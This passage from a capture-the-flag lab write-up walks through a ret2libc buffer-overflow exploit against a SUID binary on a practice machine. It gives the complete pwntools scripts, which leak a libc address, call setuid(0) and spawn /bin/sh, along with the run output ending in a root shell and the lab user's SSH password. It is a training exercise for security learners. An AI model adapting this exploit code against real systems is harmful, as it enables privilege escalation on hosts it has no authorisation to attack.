log.info(“__libc_start_main: ” + hex(LIBC_START_MAIN))
log.info(“pop rdi gadget: ” + hex(POP_RDI))

payload = “A” * 136
payload += p64(POP_RDI)
payload += p64(LIBC_START_MAIN)
payload += p64(PUTS)
payload += p64(MAIN)

p.recvuntil(‘password:’)
p.sendline(payload)
p.recvline()
p.recvline()
leak = p.recvline().strip()
leak = u64(leak.ljust(8, “\x00”))

log.success(“Leaked __libc_start_main: ” + hex(leak))
return leak

def shell(p,elf,libc,rop):
RET = rop.find_gadget([‘ret’])[0]
POP_RDI = (rop.find_gadget([‘pop rdi’, ‘ret’]))[0]
BIN_SH = next(libc.search(“/bin/sh”))
SYSTEM = libc.sym[“system”]

log.success(“/bin/sh: ” + hex(BIN_SH))
log.success(“system: ” + hex(SYSTEM))

payload = “A” * 136
payload += p64(RET)
payload += p64(POP_RDI)
payload += p64(BIN_SH)
payload += p64(SYSTEM)

p.recvuntil(‘password:’)
p.sendline(payload)
p.interactive()

r = ssh(host=’ellingson.htb’, user=’margo’, password=’iamgod$08′)
p = r.process(‘/usr/bin/garbage’)

elf = ELF(“./garbage”)
libc = ELF(“./libc.so.6”)
rop = ROP(elf)

leak = leak(p,elf,libc,rop)
libc.address = leak – libc.sym[“__libc_start_main”]

log.info(“Calculated libc address: ” + hex(libc.address))

shell(p,elf,libc,rop)

save it

root@kali:~/Downloads# ./exploit.py
[+] Connecting to ellingson.htb on port 22: Done
[*] margo@ellingson.htb:
Distro Ubuntu 18.04
OS: linux
Arch: amd64
Version: 4.15.0
ASLR: Enabled
[+] Starting remote process ‘/usr/bin/garbage’ on ellingson.htb: pid 32524
[*] ‘/root/Downloads/garbage’
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[*] ‘/root/Downloads/libc.so.6’
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[*] Loaded cached gadgets for ‘./garbage’
[*] puts@plt: 0x401050
[*] __libc_start_main: 0x403ff0
[*] pop rdi gadget: 0x40179b
[+] Leaked __libc_start_main: 0x7f95136bdab0
[*] Calculated libc address: 0x7f951369c000
[+] /bin/sh: 0x7f951384fe9a
[+] system: 0x7f95136eb440
[*] Switching to interactive mode

access denied.

$ $ whoami
margo

$ $ id
uid=1002(margo) gid=1002(margo) groups=1002(margo)

root@kali:~# gedit exploit.py

#!/usr/bin/python
from pwn import *

def leak(p,elf,libc,rop):
POP_RDI = (rop.find_gadget([‘pop rdi’, ‘ret’]))[0]
LIBC_START_MAIN = elf.symbols[‘__libc_start_main’]
PUTS = elf.plt[‘puts’]
MAIN = elf.symbols[‘main’]

log.info(“puts@plt: ” + hex(PUTS))
log.info(“__libc_start_main: ” + hex(LIBC_START_MAIN))
log.info(“pop rdi gadget: ” + hex(POP_RDI))

payload = “A” * 136
payload += p64(POP_RDI)
payload += p64(LIBC_START_MAIN)
payload += p64(PUTS)
payload += p64(MAIN)

p.recvuntil(‘password:’)
p.sendline(payload)
p.recvline()
p.recvline()
leak = p.recvline().strip()
leak = u64(leak.ljust(8, “\x00”))

log.success(“Leaked __libc_start_main: ” + hex(leak))
return leak

def suid(p,elf,libc,rop):
POP_RDI = (rop.find_gadget([‘pop rdi’, ‘ret’]))[0]
SUID = libc.sym[‘setuid’]
MAIN = elf.symbols[‘main’]

payload = “A” * 136
payload += p64(POP_RDI)
payload += p64(0)
payload += p64(SUID)
payload += p64(MAIN)
p.recvuntil(‘password:’)
p.sendline(payload)

def shell(p,elf,libc,rop):
RET = rop.find_gadget([‘ret’])[0]
POP_RDI = (rop.find_gadget([‘pop rdi’, ‘ret’]))[0]
BIN_SH = next(libc.search(“/bin/sh”))
SYSTEM = libc.sym[“system”]

log.success(“/bin/sh: ” + hex(BIN_SH))
log.success(“system: ” + hex(SYSTEM))

payload = “A” * 136
payload += p64(RET)
payload += p64(POP_RDI)
payload += p64(BIN_SH)
payload += p64(SYSTEM)

p.recvuntil(‘password:’)
p.sendline(payload)
p.interactive()

r = ssh(host=’ellingson.htb’, user=’margo’, password=’iamgod$08′)
p = r.process(‘/usr/bin/garbage’)

elf = ELF(“./garbage”)
libc = ELF(“./libc.so.6”)
rop = ROP(elf)

leak = leak(p,elf,libc,rop)
libc.address = leak – libc.sym[“__libc_start_main”]

log.info(“Calculated libc address: ” + hex(libc.address))
log.info(“Setting uid to 0”)

suid(p,elf,libc,rop)
shell(p,elf,libc,rop)

save it

root@kali:~/Downloads# ./exploit.py
[+] Connecting to ellingson.htb on port 22: Done
[*] margo@ellingson.htb:
Distro Ubuntu 18.04
OS: linux
Arch: amd64
Version: 4.15.0
ASLR: Enabled
[+] Starting remote process ‘/usr/bin/garbage’ on ellingson.htb: pid 32621
[*] ‘/root/Downloads/garbage’
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[*] ‘/root/Downloads/libc.so.6’
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[*] Loaded cached gadgets for ‘./garbage’
[*] puts@plt: 0x401050
[*] __libc_start_main: 0x403ff0
[*] pop rdi gadget: 0x40179b
[+] Leaked __libc_start_main: 0x7fca3dab9ab0
[*] Calculated libc address: 0x7fca3da98000
[*] Setting uid to 0
[+] /bin/sh: 0x7fca3dc4be9a
[+] system: 0x7fca3dae7440
[*] Switching to interactive mode

access denied.
# $ id
uid=0(root) gid=1002(margo) groups=1002(margo)

# $ cat /root/root.txt
1cc73a44802XXXXXXXXXXXXXXXXXXXXXXXXXX

@SAKSHAM DIXIT